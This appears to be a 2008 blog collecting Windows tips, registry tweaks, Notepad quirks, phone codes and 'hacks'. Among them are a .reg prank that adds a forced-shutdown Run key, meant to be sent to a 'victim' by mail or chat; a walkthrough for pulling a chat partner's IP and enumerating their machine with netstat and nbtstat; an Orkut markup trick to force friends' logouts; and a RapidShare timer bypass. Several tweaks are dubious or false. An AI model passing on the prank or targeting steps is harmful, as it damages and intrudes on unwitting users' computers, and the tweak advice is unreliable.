Wednesday, February 27, 2008

Can't open portable/fixed drives with double-click

Here is a simple solution.

1.Create a new text file and rename it as "autorun.inf".
2.Copy following code to the file and save it.
Codecheck attached image for assistance)

[AutoRun]
open=C:\windows\explorer.exe

Copy this file to all drives and you are done.

Unmount flash drive,and insert it again.

Now when you will double-click any drive,it will simply open without any "open with..."dialog.

Default ur Windows Settings

Remove any fixes you made.

Type in Start Run
regsvr32 /i shell32

Friday, February 15, 2008

Who is Successful Tester ?

7 Habits of successful Testers

1)Self Driven or high levels of Inner drive for learning new things – No fear of unknown.
2)Spontaneous – Thinks on the feet – Good in emergency response.
3)Agile and adaptable.
4)Love for Science (Physics/Chemistry), Mathematics and Philosophy.
5)Love for problem, Puzzles.
6)Hunger for self Expression – Writing, speaking.
Organized Skepticism and constantly challenge their own thoughts

orkut banned | youtube banned | firefox banned - solution

orkut banned | youtube banned | firefox banned - solution

Many people are facing a common problem, where Orkut.com, Youtube.com and Firefox are blocked in their systems and they get following error with a scary laugh:

" Orkut IS BANNED, orkut is banned you fool The administrators didnt write this program guess who did?? r r HAHAHA!! "

So here I’m posting a detailed procedure to solve this problem.

It happens bcoz of “Heap41a / win32.USBworm” which spreads through USB pen drives and removable storage devices. I’ll tell you manual as well as automatic method to remove the virus:

————————-

A. MANUAL METHOD:

Follow these instructions:

1. Open “Task Manager” and goto “Processes” tab.

2. Look for services with name “svchost.exe“. There will be many services with the same name. Most of them will have “SYSTEM“, “LOCAL SERVICE” OR “NETWORK SERVICE” as User Name but you have to look for “svchost.exe” service which has your currently logged in username as User Name.

3. You’ll get approx. 2 services with the name “svchost.exe” which has your Windows username. End Task them by pressing key or by selecting them and clicking on “End Process” button. It’ll confirm the action, accept it.

4. Now open “regedit” from RUN and goto following keys:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Policies\Explorer\Run

And look for a key in right-side pane with the name “Winlogon” which will have “heap41a\svchost.exe” in its value field. If you find this key, delete it.

5. Now goto following key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\explorer\Advanced\Folder\Hidden\SHOWALL

And in right-side pane, change value of “CheckedValue” to 1

6. Now enable “Show Hidden Files/Folders” option in “Tools -> Folder Options” in My Computer.

7. Right-click on Start button and select “Open“. Now open “Programs” folder, here you’ll see a folder “Startup“. Open it and if you get a hidden file there, delete it. If its not there, then close it.

8. At last open “My Computer” and open C: drive. Disable “Hide Protected System files” option in “Tools -> Folder Options“. You’ll see a folder “heap41a” in C: drive. Delete it.

Thats it. After doing all this, restart your system and you’ll get rid of the virus.

Notepad Trick !

Notepad Trick !

Step 1: Open Notepad
Step 2: Write following line in the notepad.

this app can break

Step 3: Save this file with any name.
Step 4: Close the notepad.
Step 5: Open the file again.

Voilla!!

or

Step 1: Open Notepad this time a new one , don't modify the previous one
Step 2: Write following line in the notepad.

Bush hid the facts

Step 3: Save this file with any name.
Step 4: Close the notepad.
Step 5: Open the file again.

Again HOO-HAA

GENERALIZED :

1> Open Notepad
2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
3> DON'T hit enter at the end of the line.
4> Save the file.
5> Close Notepad.
6> Reopen Notepad.
7> Open the file you just saved.

SOme more sentences which yields the same results (all "squares") if you type them in notepad.exe and open them again.

MS app can break
java app can break
VB app can break
.NET app can break
your app can break
mine app can break
bill app can break
gate app can break
this mpp can break
bank app can break
PS app can break
U.S. app can break


The reason behind this HOO-HAA in notepad is :

In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.

1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters


"world trade center trick"..


Did you know that the flight number of the plane that had hit WTC ...on
9/11 was Q33N ....Open your Notepad in ur computer and type the flight
number i.e Q33N... Increase the Font Size to 72, Change the Font to
Wingdings. you will be amazed by the findings

Thursday, February 14, 2008

Shutdown ur friend's comp when everytime it starts

put this followin text in a .reg file and run it in the victims pc:
send thru mail or while chatting share the file

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"

DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]and remove the string value named VIRUS, restart you computer.

Dos Commands - Magic

Renames a file or directory.
RMDIR
Removes an empty directory.
ROUTE
View and configure windows network route tables.
RUNAS
Enables a user to execute a program on another computer.
SCANDISK
Run the scandisk utility.
SCANREG
Scan registry and recover registry from errors.
SET
Change one variable or string to another.
SETLOCAL
Enables local environments to be changed without affecting anything else.
SETVER
Change MS-DOS version to trick older MS-DOS programs.
SHARE
Installs support for file sharing and locking capabilities.
SHIFT
Changes the position of replaceable parameters in a batch program.
SHUTDOWN
Shutdown the computer from the MS-DOS prompt.
SMARTDRV
Create a disk cache in conventional memory or extended memory.
SORT
Sorts the input and displays the output to the screen.
START
Start a separate window in Windows from the MS-DOS prompt.
SUBST
Substitute a folder on your computer for another drive letter.
SWITCHES
Remove add functions from MS-DOS.
SYS
Transfer system files to disk drive.
TELNET
Telnet to another computer / device from the prompt.
TIME
View or modify the system time.
TITLE
Change the title of their MS-DOS window.
TRACERT
Visually view a network packets route across a network.
TREE
View a visual tree of the hard disk drive.
TYPE
Display the contents of a file.
UNDELETE
Undelete a file that has been deleted.
UNFORMAT
Unformat a hard disk drive.
UNLOCK
Unlock a disk drive.
VER
Display the version information.
VERIFY
Enables or disables the feature to determine if files have been written properly.
VOL
Displays the volume information about the designated drive.
XCOPY
Copy multiple files, directories, and/or drives from one location to another.

Hack Internet Explorer

Go to start->run
Type regedit
press enter
in registry editor go to
HKEY_CURRENT_USER->Software->Microsoft->Internet explorer->main
there u will find something like "windows title"
double click on that and change the value data with anything u want
and click ok
press F5
restart ur internet explorer
see the title of it

Hack PC while chatting

I am not sure that this will work 100 %.
But yes will work almost 70 percent of the times.
But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u having a problem post here.

Following are the features : -

1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyse
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.

So why to wait lets exploit those 50 % chances .
I'll explain only for files here which lies same for Video or audio

1) Go to dos
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->

2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED


3) so what next???
Hmmm........ Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14

Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
XYZ <00> GROUP Registered
XYZ <20> UNIQUE Registered
XYZCOMP1 <1E> GROUP Registered

MAC Address = 00-C0-W0-D5-EF-9A

What to do next??
It is now ur job to tell me what u have done next...


So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.

Change Ur Processor Title to any Name such as Pentium 7

GO TO START>RUN>TYPE REGEDIT>HKEY_LOCAL_MACHINE>HARDWARE>DISCRIPTION>
SYSTEM>CENTRAL PROCESSOR>
ON RIGHT HAND SIDE RIGHT CLICK ON PROCESSORNAMESTRING AND THEN WRITE ANYTHING U WANT IN THAT TEXTBOX

Make IE faster

1. click start > run
2. type regedit > enter
3. browse folder HKEY_CURRENT_USER\Software\m*cro$oft\Windows\CurrentVersion
\InternetSettings
4. right click @ windows right > New > DWORD
5. type MaxConnectionsPerServer > u can set value (the more higher the no, the more good
speed u get, eg : 99)
6. create another DWORD >type MaxConnectionsPer1_0Server
7. then put a high value as mentioned above
8. then, restart IE ... ur finished.This Trick will increase your browsing speed as well as downloading speed

Wednesday, February 13, 2008

Force Logout in Orkut

Force Logout your friends from Orkut

(((height="1">)))

Just Copy the above code without the quotes and paste in to the ScrapBook of your friends..

See the Magic

Sunday, February 10, 2008

Nokia Codes and Security Stuff

Code Function

*3370# Activate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx. 5%

#3370# Deactivate Enhanced Full Rate Codec (EFR)

*#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time

*#4720# Deactivate Half Rate Codec

*#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line : Compression Type

*#9999# Phones software version if *#0000# does not work

*#06# For checking the International Mobile Equipment Identity (IMEI Number)

#pw+1234567890+1# Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

#pw+1234567890+2# Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

#pw+1234567890+3# Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

#pw+1234567890+4# SIM Card Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

*#147# This lets you know who called you last (Only vodofone)

*#1471# Last call (Only vodofone)

*#21# Allows you to check the number that "All Calls" are diverted to

*#2640# Displays security code in use

*#30# Lets you see the private number

*#43# Allows you to check the "Call Waiting" status of your phone.

*#61# Allows you to check the number that "On No Reply" calls are diverted to

*#62# Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to

#67# Allows you to check the number that "On Busy Calls" are diverted to

*#67705646# Removes operator logo on 3310 & 3330

*#73# Reset phone timers and game scores

*#746025625# (or: *#SIM0CLOCK#) Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it means you will get the best standby time possible

*#7760# Manufactures code

*#7780# Restore factory settings

*#8110# Software version for the nokia 8110

*#94870345123456789# Deact the PWM-Mem

Start computer in 10 seconds

" Start computer in 10 seconds "

Right heres what u have to do to turn ur pc on in 10 seconds:
Click on the start button then press R it will take u to Run well go to run
n type Regedit
press enter
this will open Registery Editor
now look for the key

HKEY_LOACAL_MECHINE\SYSTEM\CurrentControlSet\Control\ContentIndex

now there find the Key Called
"Startup Delay"
Double Click On It
Now where its Base
Click Decimal
Now its Default Value Is 4800000
Change The Value To 40000
here u go u have done it
now close the Registery Editor and Restart Your Computer
You'll See The Result

KNOW U R IP ADRESS

WANT TO KNOW U R IP ADRESS

* Go to the "DOS Prompt" or the "Command Prompt"
* Type:

ipconfig /all

FIX HIDDEN FILES PROBLEM

{Navigate to the windows registry:
Go to Start menu
Click Run
Type regedit in the text box and then click Enter.

When the Registry Editor opens, perform the following steps:

Go to the following registry key:

Go to HKEY_LOCAL_MACHINE and then open Software.Under this navigate to: Microsoft -> Windows -> Current Version -> Explorer Then go to Advanced -> Folder -> Hidden -> SHOWALL
Delete the value CheckedValue.
(Its type should be REG_SZ and data should be 2 or 0.)

Create a new DWORD value called CheckedValue (same as above, except that the type is REG_DWORD).

Modify the value data to 1 (0×00000001).This should enable you to select the ‘Show hidden files and folders’ option without much problem. So you get rid out of the problem..... }

Remove User Name From Start Menu

To remove user name from
Start Menu >START > RUN> GPEDIT.MSC > USER CONFIGURATION > ADMINISTRATIVE TEMPLATES > START MENU AND TASKBAR > FIND REMOVE USER NAME FROM START MENU > RIGHT CLICK PROPERTIES > CHECK ENABLED > OK

HIde a Folder Withour Any Software

1. To hide a folder named Movies in D:\Movies .
2. In the same drive next to the folder create a new notepad file with the exact statement ren Movies Movies .{21EC2020-3AEA-1069-A2DD-08002B30309D}
3. Now save this text file as loc.bat
4. Create another notepad file and type ren Movies .{21EC2020-3AEA-1069-A2DD-08002B30309D} Movies
5. Save this as key.bat
6. Now there are two batch files. Double click loc.bat and your folder will change into Control Panel and its contents cannot be viewed .
7. To open the folder double click key.bat and you get back your original folder.
8. For safety purpose hide the key.bat. For unlocking unhide the key.bat and double click it.

Creat New Invisible Folder on Your Desktop

1)Right Click on the desktop.Make a new folder
2)Now rename the folder with a space, and hold ALT key and type 0160.( first give a space so, there should be no letter, and then Hold Alt key and type 0160)
3)Now u have a folder without a name.
4)Right click on the folder>properties>customize. Click on change icon.
5)Scroll a bit, u will find some empty spaces, Click on any one of them.

Hide any drive on your system

Hide any drive on your system

If u r having any material like important docs and u r afraid about it . Dont worry, windows XP provides (not officialy ) a utility by which u can hide urs one or more drives.
Here is the step by step procedure how to hide any partition/drive :

1. Go to Start > run > type “diskpart”.
A DOS window will appear with following description.
DISKPART>

2. Then type “list volume”
The result will look like : ——
Volume ### Ltr Label Fs Type Size Status Info
————— — ——– —- —— —- —— —-

Volume 0 F CD-ROM
Volume 1 C Programmea NTFS Partition 15GB Healthy System
Volume 2 D Softwares NTFS Partition 20GB Healthy
Volume 3 E Documents NTFS Partition 30GB Healthy
Volume 4 F Abi NTFS Partition 10GB Healthy

3. Suppose u wanna hide drive E then type “select volume 3".(without quotes)
Then a message will appear in same winwods { Volume 3 is the selected volume}

4. Now type “remove letter E”
Now a message will come { Diskpart Removed the Drive letter }

Diskpart will remove the letter .Windows XP is not having capabilty to identify the
unkown volume.

Your Data is safe now from all unauthorised users.
To access the content of hidden Drive repeat the process mentioned above.
But in 4th step replace

” remove” to “assign”
i mean type “assign letter E”

Never hide C:/ drive… otherwise ur system will not work

Cheats of window games

Cheats of window games


Freecell
Start the Game.
1. Hold down Ctrl + Shift + F10 together.
2. A dialog box shows up with 4 choices: Abort, Win, Retry or Cancel.
3. Click Abort and move (drag) any card to the top to win the game.

UPDATES:
1. Check this other FreeCell cheat, courtesy of Ari Lintula (ari.lintula@dlc.fi):
"Start a game. If you have moved a wrong card, quickly press F10 before clicking another card. It's the Undo button."

2. To sort all cards by color and in:
- ascending order: click Game -> click Select Game (hit F3) -> click Yes to cancel game in progress -> type -1 -> click OK.
- descending order: click Game -> click Select Game (hit F3) -> click Yes to cancel game in progress -> type -2 -> click OK.


Hearts

This Egg works ONLY with the Windows 95 and 98 releases of Microsoft Hearts. (Mshearts.exe).

1. Run Regedit.exe (the Win9x Registry editor, located in your Win9x folder) and go to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts
2. In the right hand pane add a new String and name it "zb" (no quotes).
3. Give it a value of 42.
4. Now run Mshearts.exe and during gameplay press Ctrl + Alt + Shift + F12 the same time.


Minesweeper

After starting the game, type xyzzy and press Shift and Enter at the same time. Move the mouse over the playing area and keep
your eye on the upper left corner of the Windows desktop. A white pixel will appear when the mouse pointer is over a safe
square, and turn dark when the mouse is over a mine.

Troubleshooting of Network Interface Card

TROUBLESHOOTING OF N.I.C CARDS


1) N.I.C Not Sensing:


* First, check for the dust on the pin of the connector. If any, clean it to ensure proper contact of the tracks. (Or cleaning solution).
* If that does not solve the problem, check the crystal frequency. If it is not working, replace the crystal.
* If the crystal is O.K, check if the S.M.D or any components are dry soldered. If so, resolder the components.
* If that doesn’t work them replace the S.M.D. This will definitely solve the problem.

2) No Display If The Card Is Inserted:


* Just check for the shorting on the card, because display will not come if there is any shorting. If a shorting is found, try to correct it.
* If any component is shorted, try replacing the component. This will solve your problem.

3) N.I.C Not Connecting Through BNC As Well As UTP:


* Check for any dry soldering of the components on the card. If any, resolder the same.
* Check the transceivers on the card. If they are faulty, replace them with working ones.
* Check for shorting of the S.M.D. Correct it, if any.
* Touch up the S.M.D, in case it is dry- soldered.
Replace the main S.M.D.

N.I.C Not Connecting Through UTP Only:


In the case of the UTP, the path for the data is from the S.M.D to the transceiver & then to the cable.
Therefore, if the UTP is not working, the problem lies mainly with the transceiver. Try changing the transceiver.
If the Transceiver is O.K, try changing the delay line.

N.I.C Not Connecting Through BNC Only:


In the case of the BNC, the path for the data is from the S.M.D to the voltage converter, converter to the transceiver & then to the cable.
So, if the BNC is not working, check whether the converter is giving the proper output voltage. If it is faulty, replace it.
If the converter output is correct, then the transceiver could be faulty. Try changing the same.
If that does not help, the problem lies with the S.M.D alone. Replace it.

Renaming The Recycle Bin icon:

Renaming The Recycle Bin icon:


To change the name of the Recycle Bin desktop icon, click Start then goto Run, write Regedit and press Enter.
It opens Registry Editor.
Now in Registry Editor go to:
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}
and change the name "Recycle Bin" to whatever you want (don't type any quotes).

Posted by amitjadhav

Renaming The Start Button:

Renaming The Start Button:

To rename the start button, you will need a hex editor.
My preference is UltraEdit


Copy the \windows\explore.exe file to a new name (e.g. explorer_1.exe)
With the hex editor, open that file and go to offset 412b6
You will see the word start with blanks between each letter
Edit it be any 5 characters or less
Save the file
Boot to DOS
Copy the existing c:\windows\explorer.exe to explorer.org
Copy explorer_1.exe to explorer.exe
You will also need to replace the explorer.exe in the c:\windows\system32\dllcache file as well with the new one.
Note: If the partition is NTFS and you can't access the files from DOS:

Start Regedit
Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon.
Change the value of Shell from Explorer.exe to explorer_1.exe

Use system restore when you cannot boot your system:

Use system restore when you cannot boot your system:

If your system has failed to the point where you cannot access the Windows GUI either through booting normally or through safe mode, you may still have the chance to use the System Restore feature if you have it enabled, by running it form the command prompt.

To do this:

Restart your computer and press F8 after the POST screen to bring up the Windows XP boot menu. Choose 'boot in safe mode with command prompt.'

If your system gets to the command prompt successfully, type '%systemroot%\system32\restore\rstrui.exe' and then press enter.

Follow the onscreen instructions to restore your computer to a previous saved point.

Posted by amitjadhav

To Increase the Internet Speed:

To Increase the Internet Speed:

Open Notepad and paste the below code in it.

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"SackOpts"=dword:00000001
"TcpWindowSize"=dword:0005ae4c
"Tcp1323Opts"=dword:00000003
"DefaultTTL"=dword:00000040
"EnablePMTUBHDetect"=dword:00000000
"EnablePMTUDiscovery"=dword:00000001
"GlobalMaxTcpWindowSize"=dword:0005ae4c

Rapidshare Hack

RAPIDSHARE HACK:

Method 1:

Open your rapid share link
Then click on free.
As soon as timer start type this in address bar and click enter javascript:alert(c=0)
A pop up message will come click ok your counter is zero just download the stuff

Method 2:

Delete the cookies in your browser internet explorer or Firefox or opera or whatever u use).
Press start->run,type cmd.
In the command prompt,type ipconfig/flushdns press enter.Then type ipconfig/release,then ipconfig/renew .Now type exit.
Now try downloading, for many people this may work if their ISP provides a dynamic ip.

Method 3:


Just switch off your router or modem) and switch it back on.
This may work for some users Mtnl and Bsnl) and maybe some others too.

Actually these methods generally work for those people whose ISP gives them dynamic ip.
If these don't work then one more thing that can be done is to use proxies

Control Panel Run Shortcuts:

Control Panel Run Shortcuts:

The Run dialog gives you easy access to many different programs and options. To get to the Run dialog, click the Start button, then click Run. Type in the command and press Enter, to launch it. For example, type "control folders" (without the quotes) in the Run dialog and press ENTER. Here is a list of commands to use, and what they do:

control - Control Panel
control folders - Folder Options
control userpasswords - User Accounts
control userpasswords2 - Advanced User Accounts
control desktop - Display Properties
control printers - Printers and Faxes
control mouse - Mouse Properties
control keyboard - Keyboard Properties
control netconnections - Network Connections
control color - Display Properties \ Screensaver
control date/time - Date and Time Properties
control schedtasks - Scheduled Tasks
control admintools - Administrative Tools
control telephony - Phone and Modem Options
control fonts - Fonts Folder
control international - Regional and Language

Chat With Command Prompt:

Chat With Command Prompt:

If you want personal chat with a friend
you don't need to download any yahoo messenger
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
Now save this as "Messenger.bat". Open the .bat file and in Command
Prompt you should see:
MESSENGER
User:
After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.Before you press "Enter" it should look like this:
MESSENGER
User:27.196.391.193
Message: Hi
Now all you need to do is press "Enter", and start chatting!

Hidden Programs In Windows XP !

Hidden Programs In Windows XP !

Strange, but true that some good programs are hidden in Windows XP !!!

Programs :

1. Private Character Editor :
Used for editing fonts,etc.

** start>>Run
** Now, type eudcedit


2. Dr. Watson :
This an inbuilt windows repairing software !

** start>>Run
** Now, type drwtsn32


3. Media Player 5.1 :
Even if you upgrade your Media Player, you can still access your old player in case the new one fails !!!

** start>>Run
** Now, type mplay32


4. iExpress :
Used to create Setups

You can create your own installers !

** start>>Run
** Now, type iexpress

Enabling right click on websites which block it

Enabling right click on websites which block it

Many websites nowadays disable the right click function of the mouse button which I think could be very annoying sometimes. This is done so that we can’t steal images, file, video, or any other website’s stuff. What about if we extremely in a need of the file without any profit-making and other bad intentions? In this post a tutorial is included to teach you how to solve the problem, without having to open the source code of course!

If you use Internet Explorer 6 and 7

Click “Tools”->”Internet Options”
Click the “Security” tab.
Click “Custom Level”
Scroll down to the “scripting” section.
Set “Active Scripting” to “disable” (Active scripts are programs written in Javascript)
Click “Ok”. Restart your internet browser.
Note: This will disable the Javascript from being rendered by your Internet Explorer browser which would mean the right click disabled’s script in the website will not work anymore.
For Mozilla Firefox browser, these are the steps which gave the same effect (maybe be vary depending on the version).

Go to “Tools” -> “Options”
Click “Web Features”
Untick enable JavaScript
Alternatively, you can also use this method to re-enabled the website right click function.
Enter the Javascript code below inside your browser’s address bar. (source)

javascript:void(document.oncontextmenu=null

Voila!

Posted by

Insert your name in the bottom right taskbar

Insert your name in the bottom right taskbar!!!

Hey its a very cool trick u can amaze u r freinds and relatives by insertng ur name on the bottom right taskbar. Follow the instructions bellow:

Open Control Panel -> Regional and Language Options -> Customize ->Time
here u can see A.M. and P.M. change it with u r name. Thats it.

Show your designed wallpaper while booting

Show your designed wallpaper while booting

To start with just a simple one. Guess many of us knows this one that how to show your own image or name while PC boots up. In Windows 98 it was possible by editing the logol.bmp file. But in XP, simply u need to edit a registry value.

First create a BMP file as u want. Its size should be at least 800*600 and save it.

Go to run.

Type "regedit" press enter.

In registry editor navigate to "HKEY_USERS\.DEFAULT\Control Panel\Desktop".

U will find a value called "wallpaper" there. Double click that and set the value to the location of the BMP file (with Full Path. Eg: C:\Wallpaper\xyz.bmp).

If the value called wallpaper is not present then create a new string value and name it as Wallpaper and set its value.

Now Reboot. Your designed wallpaper will b shown just before the welcome screen appears.

Making all files and folders open fast

Making all files and folders open fast

Go to Start then Run
Type 'Regedit' then click 'Ok'
Find "HKEY_CURRENT_USER\Control Panel\Desktop\"
Select "MenuShowDelay"
Right click and select "Modify'
Reduce the number to around "100"
This is the delay time before a menu is opened. You can set it to "0" but it can make windows really hard to use as menus will open if you just look at them - well move your mouse over them anyway. I tend to go for anywhere between 50-150 depending on my mood.

Tired of typing www for logging onto every website...???

Tired of typing www for logging onto every website...???

Every time you enter a webadress you have to enter www before entering the web address.instead of doing this just type the website name on the address bar and use the short cut key-CTRL+ENTER.The website opens.

Use Microsoft Calculator to surf Internet

Use Microsoft Calculator to surf Internet

1. Open your MS Calculator. This is normally found in Start => All Programs => Accessories => Calculator.
2. Open the help-window by pressing the F1 key.
3. Click the top-left corner icon of the help window once (Standard is a Document with a Questionmark).
4. Select Go to URL-address.
5. Type your address into the avaliable field, but remember to type http://, and not just www. (or equivalent).
6. Have fun!

Dummy entries in Add/Remove Programs list

Sometimes, even after program are uninstalled, or due to the files being deleted instead of a uninstalled, the entry in the Add/Remove Programs list does not get deleted. To remove it form the list: 1. Start the Registry Editor. 2. Open HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \CurrentVersion\Uninstall. 3. Delete the program entry here. You can also use Tweak UI to do this.

How to Hack an EXE File

Could you edit an executable file when it has been compiled? Yes, you could. But you could only change the String data. How? Using the MS-DOS Text Editor. The String data is text, but in the file will appear different. For example, if in the application appears

About NotePad in the compiled file will appear A b o u t N o t e P a d with an space between each word. Before modifying the file, make a back-up of it. If you want to modify the file, first you have to open it using the MS-DOS Text Editor and open the file as Binary. Then activate the Insert key and search for some text data in the program. But, it isn't as easy as said. You have to search it manually, 'coz the words are separated by a space between. Then replace each word for anyone you want. Example:

N o t e P a d to M y P r o g r
BE CAREFUL: The file must weight the same than the original; if not, it could not work.
[Even then the file may not work. For example, it might calculate its checksum and notice that you have made changes. This is certainly a dangerous technique. So at least make a backup copy of the file before you mess with it.

Any more doubts contact me.....

Speed Up Ur Modem

Even if your modem if apparently working well, the baud rate of your COM Port might not allow you to reach top-speed. To improve your port's speed:

* Click Start >Settings > Control Panel > System.
* Click the Device Manager tab, and click on the "+" sign next to Ports (COM & LPT).
* Select the port your modem uses, click Properties, then click the Port settings tab and set the Bits per second to 115200 bps. That way you won't have a sort of filter on the Port.

Restart only Windows

When restarting Windows, you don't always need to go to thought the BIOS initialization and POST. Instead of simple clicking on Restart form the Shut Down Windows dialog box, help down the Shift key as you click on OK. This will restart only Windows. This is particularly useful when you change some registry entries or a few system settings.

Improve Removable Disk Drive Performance
Windows gives you the option to use write-behind caching to improve the performance of removable disk drivers.

* Open control Panel > System > Performance and click on File System.
* Check the Enable write-behind caching on all removable disk drives check box under the removable Disk tab and click OK

Note: If this result in a problem with disk operations, uncheck the Enable write-behind caching on all removable disk drives check box.

Saturday, February 9, 2008

Invisible Scraps in Orkut

write Invisible Scraps

[ b ]
[ i ]

without spaces